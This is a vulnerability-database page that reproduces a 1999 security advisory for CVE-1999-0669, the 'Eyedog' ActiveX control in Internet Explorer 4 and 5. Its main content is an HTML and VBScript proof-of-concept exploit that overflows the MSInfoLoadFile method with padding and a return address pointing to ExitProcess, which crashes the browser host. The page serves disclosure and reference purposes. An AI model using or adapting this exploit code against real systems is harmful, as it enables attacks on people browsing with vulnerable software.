Recent Vulnerabilities Product List Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-1999-0669

Publish Date: 21 Aug 1999

                Microsoft Internet Explorer 4.0/5.0 for Windows 95/Windows NT 4/Windows 2000/Windows 95/Windows 98 ActiveX "Eyedog" Vulnerability

source: http://www.securityfocus.com/bid/619/info

The Eyedog ActiveX control is marked 'safe for scripting' although it permits registry access and other information gathering methods to be used. It also contains a buffer overflow error. These weaknesses can be exploited remotely via a malicious webpage or email.

With this control, MSInfoLoadFile is the offending method. 
There is no easy way to RET to our code, so instead, I have 
shown how to simply RET to ExitProcess directly. This will 
cause the host to terminate.

&lt;object classid="clsid:06A7EC63-4E21-11D0-A112-00A0C90543AA"
id="eye"&gt;&lt;/object&gt;

&lt;script language="vbscript"&gt;&lt;!--

msgbox("EYEDOG OLE Control module Buffer Overrun (Local 
Version)" + Chr(10) + "Written by Shane Hird")

'Padding for the exploit
expstr 
= "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA"

'RET address (ExitProcess, BFF8D4CA)
expstr = expstr + Chr(202) + Chr(212) + Chr(248) + Chr(191)

'Call exploitable method (MSInfoLoadFile)
eye.MSInfoLoadFile(expstr)

--&gt;&lt;/script&gt;

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Product List Vendor List Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

Microsoft Internet Explorer 4/5 - ActiveX 'Eyedog' Remote Overflow

Vulmon Search

About

Products

Connect